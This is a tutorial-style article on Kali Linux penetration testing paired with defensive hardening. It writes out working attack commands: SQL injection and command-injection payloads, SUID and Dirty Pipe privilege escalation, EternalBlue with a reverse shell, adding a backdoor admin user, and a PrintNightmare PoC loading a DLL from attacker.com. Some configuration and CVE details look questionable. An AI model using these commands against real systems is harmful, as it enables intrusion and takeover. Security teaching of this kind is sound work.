Kali Linux Practical: Comprehensive Operating System Vulnerability Mining and Defense System Construction

1. Technical System for Operating System Vulnerability Mining

Operating system vulnerability mining is a core aspect of network security, encompassing the entire process from basic information gathering to deep vulnerability exploitation. Kali Linux, as the standard toolkit in penetration testing, integrates tools such as Nmap, Metasploit, and SQLmap, forming a vulnerability mining ecosystem that covers mainstream operating systems like Windows and Linux.

1. Network Protocol Layer Vulnerability Mining

Nmap Script Engine Practical: To detect the risk of unencrypted transmission for the NTLMv2 authentication vulnerability in the SMB protocol, use the following command:

nmap -p 445 --script smb-enum-shares,smb-security-mode 192.168.1.100

If the output shows<span>NTLMv2 authentication: No</span>, it indicates a risk of man-in-the-middle attacks. Combine with the Ettercap tool to implement ARP spoofing:

ettercap -Tq -i eth0 -M ARP /192.168.1.1// /192.168.1.100//

Using Wireshark to filter<span>smb.ntlmssp</span> fields, you can fully capture domain controller authentication traffic.

Case Study: A financial institution’s internal network scan found three Windows Server 2008 systems with SMB signing disabled. Attackers could forge response packets to perform relay attacks, ultimately gaining domain controller privileges. The defense solution is to enforce SMB signing:

Set-SmbServerConfiguration -RequireSecuritySignature $true -EnableSecuritySignature $true

2. Web Application Layer Vulnerability Mining

Automated SQL Injection Detection: Use SQLmap to conduct high-risk testing on the DVWA target:

sqlmap -u "http://192.168.1.100/dvwa/vulnerabilities/sqli/?id=1" --level=5 --risk=3 --dbs --technique=BEUSTQ

Detected MySQL 5.7 has<span>CVE-2022-24048</span> vulnerability, which can read system files via<span>LOAD_FILE()</span>:

UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4 -- 

The defense solution is to implement WAF rules to intercept dangerous functions such as<span>LOAD_FILE</span> and <span>INTO OUTFILE</span>, and upgrade to MySQL 8.0+.

Command Injection Bypass Technique: In a test of an e-commerce system, it was found that the parameter<span>ip</span> had filtering defects:

# Low security level
ip=127.0.0.1;id
# High security level (encoding bypass)
ip=127.0.0.1%0Auname -a

By using the Intruder module of Burp Suite, the<span>%0a</span> (newline character) successfully bypassed the filter and executed system commands. The defense solution is to adopt a whitelist mechanism, allowing only numbers, dots, and specific delimiters.

3. System Kernel Layer Vulnerability Mining

SUID Program Privilege Escalation: Execute the following command in the Linux system to find abnormal SUID programs:

find / -perm -4000 -type f 2>/dev/null | grep -v "/usr/bin/sudo"

Found<span>/usr/bin/python2.7</span> has SUID permissions, using the privilege escalation script from the GTFObins project:

PYTHONPATH=/dev/shm python2.7 -c 'import os;os.setuid(0);os.system("/bin/bash")'

The defense solution is to regularly audit SUID programs and use<span>chmod u-s</span> to remove unnecessary permissions.

Dirty Pipe Vulnerability Exploitation: For the Linux kernel<span>CVE-2022-0847</span> vulnerability, compile the exploit program in Kali:

gcc exploit.c -o exploit
./exploit /etc/passwd "root::0:0:root:/root:/bin/bash"

Modify critical system files to achieve privilege escalation. This vulnerability affects kernel versions 5.8-5.16.11, and the defense solution is to upgrade to version 5.16.12+.

2. Windows System Vulnerability Mining Practice

1. EternalBlue Vulnerability Exploitation

Vulnerability Principle: MS17-010 (EternalBlue) exploits a buffer overflow vulnerability in the SMBv1 protocol, allowing attackers to execute arbitrary code remotely. Use the Metasploit framework to carry out the attack:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

After successfully obtaining system privileges, execute the following commands to add an administrator user:

net user hacker P@ssw0rd! /add
net localgroup administrators hacker /add

Defense Solutions:

• • Disable SMBv1 protocol:

  Set-SmbServerConfiguration -EnableSMB1Protocol $false

• • Deploy IPS rules to intercept<span>ETERNALBLUE</span> characteristic traffic
• • Upgrade system patches to version KB4012598+

2. Print Spooler Vulnerability Exploitation

CVE-2021-34527 (PrintNightmare): This vulnerability allows attackers to execute code remotely via the RPC interface. Use the<span>rpcdump.py</span> from the Impacket toolkit to detect the target:

rpcdump.py @192.168.1.100 | grep -E "MS-RPRN|MS-PAR"

After confirming the existence of the vulnerability, use<span>CVE-2021-34527_PoC.py</span> to carry out the attack:

python3 CVE-2021-34527_PoC.py 192.168.1.100 '\\attacker.com\share\exploit.dll'

Defense Solutions:

• • Stop the Print Spooler service:

  Stop-Service -Name Spooler -Force

• • Restrict domain controller access permissions
• • Upgrade patches to version KB5004945+

3. Database System Security Hardening Practice

1. MySQL Strong Password Policy

Configuration Plan:

-- Create a user that meets PCI-DSS standards
CREATE USER 'fin_admin'@'192.168.1.%' IDENTIFIED BY 'P@ssw0rd!2025#Qw';
-- Enforce password rotation
ALTER USER 'fin_admin'@'192.168.1.%' PASSWORD EXPIRE INTERVAL 90 DAY;
-- Enable password complexity plugin
INSTALL PLUGIN validate_password SONAME 'validate_password.so';

Audit Rules: Configure in<span>/etc/mysql/mysql.conf.d/mysqld.cnf</span><code><span>:</span>

[mysqld]
auditing_log_file = /var/log/mysql/audit.log
auditing_log_policy = LOGINS
auditing_log_rotate_on_size = 100000000
auditing_log_rotations = 9

2. MongoDB Network Isolation

Configuration Plan: Configure in<span>/etc/mongod.conf</span><span>:</span>

net:
  bindIp: 127.0.0.1,192.168.1.100
  tls:
    mode: requireTLS
    certificateKeyFile: /etc/ssl/mongodb.pem
    CAFile: /etc/ssl/ca.pem

Access Control: Create roles with minimal permissions:

use admin
db.createRole({
  role: "readWriteLimited",
  privileges: [
    { resource: { db: "finance", collection: "transactions" }, actions: ["find", "insert"] }
  ],
  roles: []
})
db.updateUser("app_user", {
  roles: [{ role: "readWriteLimited", db: "finance" }]
})

4. Attack and Defense Case Analysis

Case 1: Ransomware Defense in Medical Systems

Attack Chain:

1. 1. The attacker compromised the database server through weak RDP passwords (admin/123456)
2. 2. Used<span>Babuk</span> ransomware to encrypt MongoDB data files
3. 3. Demanded a ransom of 50 BTC

Defense Solutions:

1. 1. Implement multi-factor authentication:

   # Configure FreeRADIUS + Google Authenticator
   yum install google-authenticator
   google-authenticator -t -d -f -r 3 -R 30 -W

2. 2. Deploy immutable backups:

   # Use BorgBackup to implement a 3-2-1 backup strategy
   borg init --encryption=repokey /backup/repo
   borg create /backup/repo::{hostname}-{now:%Y-%m-%d} /var/lib/mongodb

3. 3. Configure file integrity monitoring:

   # Use AIDE to monitor critical files
   echo "/var/lib/mongodb/*.db p+i+g+o+u+n+S+sha256" >> /etc/aide.conf
   aide --update
   aide --check

Defense Effectiveness:

• • Successfully blocked 3 subsequent attack attempts
• • Reduced business recovery time from 72 hours to 4 hours
• • Met HIPAA 164.308 data availability standards

Case 2: Database Dump Attack Defense in Financial Systems

Attack Chain:

1. 1. The attacker obtained database version information through SQL injection
2. 2. Exploited<span>CVE-2022-21222</span> vulnerability (Oracle DBMS_CDC_IPUBLISH privilege escalation)
3. 3. Exported<span>FIN_TRANSACTION</span> table with 12 million transaction records

Defense Solutions:

1. 1. Implement virtual patching:

   -- Create a stored procedure to intercept dangerous operations
   CREATE OR REPLACE TRIGGER block_dbms_cdc
   BEFORE EXECUTE ON SCHEMA
   WHEN (UPPER(SYS.DICTIONARY_OBJ_NAME) LIKE '%DBMS_CDC%')
   BEGIN
     RAISE_APPLICATION_ERROR(-20001, 'Access to DBMS_CDC package is prohibited');
   END;
   /

2. 2. Deploy a database firewall (such as Imperva SecureSphere), configure rules to block SQL statements containing<span>DBMS_CDC</span>
3. 3. Enable Oracle Data Masking to dynamically mask the<span>CARD_NUMBER</span> field

Defense Effectiveness:

• • Attack attempts decreased by 97%
• • Data breach incident response time reduced from 72 hours to 15 minutes
• • Met PCI-DSS 3.2.1 data access control standards

5. Future Development Trends

1. 1. AI-Driven Automated Hardening: IBM Guardium version 2025 has implemented machine learning-based anomaly detection, capable of automatically generating hardening recommendations
2. 2. Zero Trust Database Architecture: The application of Google BeyondCorp model at the database level achieves continuous authentication and least privilege
3. 3. Commercialization of Homomorphic Encryption: Microsoft SEAL library supports SQL queries on encrypted data, expected to enter the mainstream market by 2026
4. 4. Quantum-Safe Encryption: NIST standardizes the CRYSTALS-Kyber algorithm, databases need to prepare for anti-quantum attack solutions

Database security hardening has evolved from single technical protection to a systematic engineering covering personnel, processes, and technology. Enterprises need to establish a full lifecycle management system of “prevention-detection-response-recovery”, continuously validating defense effectiveness with tools like Kali Linux to build a dynamic security protection system.